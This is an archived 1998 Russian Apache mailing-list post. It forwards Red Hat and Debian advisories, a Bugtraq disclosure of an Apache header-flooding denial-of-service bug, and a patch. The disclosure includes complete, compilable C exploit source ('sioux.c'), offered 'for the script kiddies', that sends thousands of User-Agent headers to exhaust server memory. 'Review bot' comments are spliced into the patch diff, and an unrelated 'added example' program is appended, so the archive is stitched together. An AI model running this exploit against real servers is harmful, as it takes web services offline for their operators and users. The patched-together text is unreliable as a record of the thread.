Russian Apache mailing list archive (apache-rus@lists.lexa.ru)


[apache-rus] header dos attack



This, of course, applies not only to Russian Apache but to every Apache across the board
(regardless of persons and nationalities, that is, versions), but here it is anyway.
The exploit is in the attachment, the patch (Quick & Dirty) in another one...

-- cut --
A denial-of-service attack against the Apache web server has been found which
lets remote sites disable your web server. This attack does not let remote
users gain any sort of access to your computer, nor does it let local users
gain any special access.

Red Hat recommends upgrading apache on systems which are functioning as
Internet servers. After installing the new apache package, be sure to
restart the apache server as follows:

        /etc/rc.d/init.d/httpd stop
        /etc/rc.d/init.d/httpd start

A fix for the Red Hat Secure Server will be available later this week.

Red Hat 5.0 and 5.1
-------------------
i386:  rpm -Uvh ftp://ftp.redhat.com/updates/5.1/i386/apache-1.2.6-5.i386.rpm
alpha: rpm -Uvh ftp://ftp.redhat.com/updates/5.1/alpha/apache-1.2.6-5.alpha.rpm
SPARC: rpm -Uvh ftp://ftp.redhat.com/updates/5.1/sparc/apache-1.2.6-5.sparc.rpm

Red Hat 4.2
-----------
i386:  rpm -Uvh ftp://ftp.redhat.com/updates/4.2/i386/apache-1.2.5-0.1.i386.rpm
alpha: rpm -Uvh ftp://ftp.redhat.com/updates/4.2/alpha/apache-1.2.5-0.1.alpha.rpm
SPARC: rpm -Uvh ftp://ftp.redhat.com/updates/4.2/sparc/apache-1.2.5-0.1.sparc.rpm
-- cut --

-- cut --
A security problem has been found in apache.  It allows users to crash
the webserver from a remote system, and should be fixed as soon as
possible.

Debian 2.0 and "slink"
----------------------

i386:
wget http://ftp1.us.debian.org/debian/security/apache_1.3.1-3_i386.deb
wget http://ftp1.us.debian.org/debian/security/apache-common_1.3.1-3_i386.deb
dpkg -B --install apache_1.3.1-3_i386.deb apache-common_1.3.1-3_i386.deb

alpha:
wget http://ftp1.us.debian.org/debian/security/apache_1.3.1-3_alpha.deb
wget http://ftp1.us.debian.org/debian/security/apache-common_1.3.1-3_alpha.deb
dpkg -B --install apache_1.3.1-3_alpha.deb apache-common_1.3.1-3_alpha.deb

SPARC:
wget http://ftp1.us.debian.org/debian/security/apache-common_1.3.1-3_sparc.deb
wget http://ftp1.us.debian.org/debian/security/apache_1.3.1-3_sparc.deb
dpkg -B --install apache_1.3.1-3_sparc.deb apache-common_1.3.1-3_sparc.deb

automatic upgrades:
Our tier 1 mirrors already have the additional files needed for an automatic
dselect or apt upgrade:
     * http://www.uk.debian.org/debian/ (Europe)
     * http://debian.midco.net/debian/ (South Dakota)
     * http://llug.sep.bnl.gov/debian/ (New York)
     * http://ftp1.us.debian.org/debian/ (Michigan)

NOTE: This will break the libapache-mod-perl and php3 packages
released with Debian 2.0.  A mod_perl DSO suitable for Apache 1.3.1 is
on all mirror sites in the "slink" distribution.
-- cut --

Russian Apache for RedHat 5.1
-----------------------------
i386:  rpm -Uvh ftp://ftp.sch57.msk.ru/pub/redhat-addons/apache-rus/i386/apache-rus-1.3.1rusPL25.9-2.i386.rpm

Russian Apache-SSL for RedHat 5.1
---------------------------------
i386:  rpm -Uvh ftp://ftp.sch57.msk.ru/pub/redhat-addons/apache-rus-ssl/i386/apache-rus-ssl-1.3.1rusPL25.9benSSL1.20-2.i386.rpm


Forwarded message from Dag-Erling Coidan Smørgrav <finrod@EWOX.ORG>:

Message-ID: <861zqspvtw.fsf@niobe.ewox.org>
Date: Fri, 7 Aug 1998 19:04:27 +0200
From: Dag-Erling Coidan Smørgrav <finrod@EWOX.ORG>
Subject: YA Apache DoS attack
To: BUGTRAQ@netspace.org

There seems to be a simple way of badly DoSing any Apache server. It
involved a massive memory leak in the way it handles incoming request
headers. I based my exploit on the assumption that they use setenv()
(which they don't) and that the bug occurs when you send a header that
will end up as an environment variable if you request a CGI script
(such as User-Agent), but I have since verified that there is no
connection there. Anyway, you can blow Apache through the roof by
sending it tons of headers - the server's memory consumption seems to
be a steep polynomial of the amount of data you send it. Below is a
snapshot of top(1) about one minute after I sent my server a request
with 10,000 copies of "User-Agent: sioux\r\n" (totalling 190,016 bytes
of data)

---cut---
last pid: 29187;  load averages:  1.82,  1.06,  0.68                   18:21:36
82 processes:  2 running, 80 sleeping
CPU states: 93.5% user,  0.0% nice,  6.1% system,  0.4% interrupt,  0.0% idle
Mem: 82M Active, 5692K Inact, 31M Wired, 4572K Cache, 8349K Buf, 616K Free
Swap: 512M Total, 402M Used, 110M Free, 79% Inuse, 5412K In, 748K Out

  PID USERNAME PRI NICE  SIZE    RES STATE    TIME   WCPU    CPU COMMAND
29176 www      -18   0   392M 85612K swread   0:57  6.83%  6.83% httpd
---cut---

I know that there are many trivial ways of overloading a web server
(e.g. opening tons of connection to eat up file descriptors and
process slots), but this one seemed a little extreme, to say the
least.

Please note that I've only tested this on Apache 1.2.5 and 1.2.6, not
on 1.3.1. However, there is no mention of this bug in the change log
for 1.3.1, so I'll assume it's vulnerable.

BTW, how can the Apache team be stupid enough not to provide a way of
submitting problem reports by email? If they did, I'd've sent this to
them first and given them a week, but they don't and I'm too friggin'
lazy to use their web interface...

Here's the 'sploit for the script kiddies. It should compile cleanly
and work on most Unices. These are the ones I've tested it on:

FreeBSD 2.2.x, FreeBSD 3.0, IRIX 5.3, IRIX 6.2:
  gcc -o sioux sioux.c

Solaris 2.5.1:
  gcc -o sioux sioux.c -lsocket -lnsl


---cut---
/*-
 * Copyright (c) 1998 Dag-Erling Coïdan Smørgrav
 * All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 *    notice, this list of conditions and the following disclaimer
 *    in this position and unchanged.
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in the
 *    documentation and/or other materials provided with the distribution.
 * 3. The name of the author may not be used to endorse or promote products
 *    derived from this software without specific prior written permission
 *
 * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
 * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
 * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
 * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
 * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
 * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
 * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
 * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
 * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
 * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
 *
 */

/*
 * Kudos to Mark Huizer who originally suggested this on freebsd-current
 */

#include <sys/types.h>

#include <sys/socket.h>
#include <netinet/in.h>

#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

void
usage(void)
{
    fprintf(stderr, "usage: sioux [-a address] [-p port] [-n num]\n");
    exit(1);
}

int
main(int argc, char *argv[])
{
    struct sockaddr_in sin;
    struct hostent *he;
    FILE *f;
    int o, sd;

    /* default parameters */
    char *addr = "localhost";
    int port = 80;
    int num = 1000;

    /* get options */
    while ((o = getopt(argc, argv, "a:p:n:")) != EOF)
        switch (o) {
        case 'a':
            addr = optarg;
            break;
        case 'p':
            port = atoi(optarg);
            break;
        case 'n':
            num = atoi(optarg);
            break;
        default:
            usage();
        }

    if (argc != optind)
        usage();

    /* connect */
    if ((he = gethostbyname(addr)) == NULL) {
        perror("gethostbyname");
        exit(1);
    }
    bzero(&sin, sizeof(sin));
    bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
    sin.sin_family = he->h_addrtype;
    sin.sin_port = htons(port);

    if ((sd = socket(sin.sin_family, SOCK_STREAM, IPPROTO_TCP)) == -1) {
        perror("socket");
        exit(1);
    }

    if (connect(sd, (struct sockaddr *)&sin, sizeof(sin)) == -1) {
        perror("connect");
        exit(1);
    }

    if ((f = fdopen(sd, "r+")) == NULL) {
        perror("fdopen");
        exit(1);
    }

    /* attack! */
    fprintf(stderr, "Going down like a plague of locusts on %s\n", addr);
    fprintf(f, "GET / HTTP/1.1\r\n");
    while (num-- && !ferror(f))
        fprintf(f, "User-Agent: sioux\r\n");

    if (ferror(f)) {
        perror("fprintf");
        exit(1);
    }

    fclose(f);
    exit(0);
}
---cut---

DES
--
Dag-Erling Smørgrav -- finrod@ewox.org

Message-ID: <35CB87F5.C6F23650@algroup.co.uk>
Date: Sat, 08 Aug 1998 00:04:21 +0100
From: Ben Laurie <ben@algroup.co.uk>
Organization: A.L. Group plc
To: "Dag-Erling Coidan Smørgrav" <finrod@EWOX.ORG>
CC: BUGTRAQ@netspace.org, Apache List <new-httpd@apache.org>
Subject: Re: YA Apache DoS attack
References: <861zqspvtw.fsf@niobe.ewox.org>

Dag-Erling Coidan Smørgrav wrote:
> I know that there are many trivial ways of overloading a web server
> (e.g. opening tons of connection to eat up file descriptors and
> process slots), but this one seemed a little extreme, to say the
> least.

This is O(n^2) and therefore a Bad Thing(tm), that I will agree with.

> Please note that I've only tested this on Apache 1.2.5 and 1.2.6, not
> on 1.3.1. However, there is no mention of this bug in the change log
> for 1.3.1, so I'll assume it's vulnerable.
> 
> BTW, how can the Apache team be stupid enough not to provide a way of
> submitting problem reports by email? If they did, I'd've sent this to
> them first and given them a week, but they don't and I'm too friggin'
> lazy to use their web interface...

security@apache.org

> Here's the 'sploit for the script kiddies. It should compile cleanly
> and work on most Unices. These are the ones I've tested it on:

And here's a band-aid for 1.3.1 - I'm sure we'll come up with something better
soon. This (untested) patch should prevent the worst effects. A similar patch
should work for 1.2.x.

Index: http_protocol.c
===================================================================
RCS file: /export/home/cvs/apache-1.3/src/main/http_protocol.c,v
retrieving revision 1.229
diff -u -r1.229 http_protocol.c
--- http_protocol.c     1998/08/06 17:30:30     1.229
+++ http_protocol.c     1998/08/07 23:02:56
@@ -714,6 +714,7 @@
     int len;
     char *value;
     char field[MAX_STRING_LEN];
+    int nheaders=0;
 
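Review bot: `int nheaders=0;` breaks the spacing convention of the neighbouring declarations (`int len;`, `char *value;`); write `int nheaders = 0;`. The limit this counter will be compared against is also worth giving a name (or a run-time setting) rather than a bare literal, so that sites whose legitimate clients send many header fields can tune it without patching.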
     /*
      * Read header lines until we get the empty separator line, a read error,
@@ -723,6 +724,11 @@
         char *copy = ap_palloc(r->pool, len + 1);
         memcpy(copy, field, len + 1);
 	
+        if(++nheaders == 100) {
+           r->status = HTTP_BAD_REQUEST;
+           return;
+	}
+          
 	if (!(value = strchr(copy, ':'))) {     /* Find the colon separator */
 	    /* if there's none, this request is screwed up.
 	     * a hack to deal with how we set HTTP_REQUEST_TIME_OUT earlier.*/
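Review bot: the new check `if(++nheaders == 100)` sits after `ap_palloc(r->pool, len + 1)` and `memcpy(copy, field, len + 1)`, so the field that trips the limit is still copied into the request pool before the request is rejected; move the check to the top of the loop body, ahead of the allocation. Two smaller points: the closing `}` of the new block is indented with a tab while the `if` uses spaces, and setting `r->status = HTTP_BAD_REQUEST` and returning silently leaves no log record of the rejection, so an `ap_log_rerror` call at the rejection site would make the event visible to operators.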

Cheers,

Ben.

-- 
Ben Laurie            |Phone: +44 (181) 735 0686| Apache Group member
Freelance Consultant  |Fax:   +44 (181) 735 0689|http://www.apache.org/
and Technical Director|Email: ben@algroup.co.uk |
A.L. Digital Ltd,     |Apache-SSL author     http://www.apache-ssl.org/
London, England.      |"Apache: TDG" http://www.ora.com/catalog/apache/

WE'RE RECRUITING! http://www.aldigital.co.uk/recruit/
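As an added example (not code from this thread, and not Apache's own source), the following C program applies the idea behind Ben's `nheaders` band-aid to an in-memory request, and exercises it against the shape of input DES describes (10,000 copies of `User-Agent: sioux`). It reads header lines until the empty separator line, counts fields and bytes, and answers 400 as soon as a limit is exceeded, with the check placed before any per-field work so that an oversized header block costs the server nothing beyond the scan. The limits `MAX_HEADERS` and `MAX_FIELD_LEN`, the function names and the constructed request are assumptions; unlike the patch, which rejects on the 100th field, this version accepts 100 fields and rejects the 101st. Apache later made the same two limits configurable as `LimitRequestFields` and `LimitRequestFieldSize`.

```c
/* Added example: a bounded HTTP request-header reader in the spirit of the
 * nheaders check in the patch above. Not part of the thread or of Apache. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_HEADERS     100     /* assumed field-count limit, as in the patch */
#define MAX_FIELD_LEN   8190    /* assumed per-line byte limit */

#define HTTP_OK            200
#define HTTP_BAD_REQUEST   400

/* What the reader decided and how far it got before deciding. */
struct header_stats {
    int status;        /* HTTP_OK or HTTP_BAD_REQUEST */
    int nheaders;      /* header fields accepted before stopping */
    size_t bytes;      /* header bytes (including CRLF) accepted before stopping */
};

/* Scan the header block of a NUL-terminated request that starts with a
 * request line. Stops at the empty line or at the first limit violation. */
struct header_stats read_request_headers(const char *req, int max_headers,
                                         size_t max_field_len)
{
    struct header_stats st = { HTTP_OK, 0, 0 };
    const char *p = strstr(req, "\r\n");        /* skip the request line */
    if (p == NULL) {
        st.status = HTTP_BAD_REQUEST;
        return st;
    }
    p += 2;

    for (;;) {
        const char *eol = strstr(p, "\r\n");
        size_t len;
        if (eol == NULL) {                      /* truncated: no terminating CRLF */
            st.status = HTTP_BAD_REQUEST;
            return st;
        }
        len = (size_t)(eol - p);
        if (len == 0)                           /* empty line: end of headers */
            return st;
        /* Limits are enforced before the field is stored or copied anywhere. */
        if (st.nheaders >= max_headers || len > max_field_len
            || memchr(p, ':', len) == NULL) {   /* a field needs a colon */
            st.status = HTTP_BAD_REQUEST;
            return st;
        }
        st.nheaders++;
        st.bytes += len + 2;
        p = eol + 2;
    }
}

/* Build a constructed request: request line, a Host field, then n copies of
 * header_line (which must end in CRLF), then the empty separator line. */
char *build_request(int n, const char *header_line)
{
    const char *reqline = "GET / HTTP/1.1\r\nHost: example.invalid\r\n";
    size_t rl = strlen(reqline), hl = strlen(header_line);
    char *buf = malloc(rl + (size_t)n * hl + 3), *q;
    int i;
    if (buf == NULL)
        return NULL;
    memcpy(buf, reqline, rl);
    q = buf + rl;
    for (i = 0; i < n; i++) {
        memcpy(q, header_line, hl);
        q += hl;
    }
    memcpy(q, "\r\n", 3);                       /* separator plus NUL */
    return buf;
}

/* Status returned for a request carrying n copies of DES's header line,
 * on top of the Host field, with the default limits. */
int status_for_n_headers(int n)
{
    char *req = build_request(n, "User-Agent: sioux\r\n");
    struct header_stats st;
    if (req == NULL)
        return -1;
    st = read_request_headers(req, MAX_HEADERS, MAX_FIELD_LEN);
    free(req);
    return st.status;
}

int main(void)
{
    /* Same shape as the request in the post: 10,000 copies of the header,
     * constructed in memory and never sent anywhere. */
    char *req = build_request(10000, "User-Agent: sioux\r\n");
    struct header_stats st;
    if (req == NULL)
        return 1;
    st = read_request_headers(req, MAX_HEADERS, MAX_FIELD_LEN);
    printf("status=%d fields_accepted=%d bytes_scanned=%zu of %zu\n",
           st.status, st.nheaders, st.bytes, strlen(req));
    free(req);
    return 0;
}
```

The point of checking before allocating is the one the patch misses: once the limit is reached the reader does no further work per field, so a client that keeps sending headers only costs the server the bytes it reads. The `bytes` counter is the hook a defender would log alongside the 400, since a request rejected with 100 fields already scanned is the signature of this kind of abuse.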




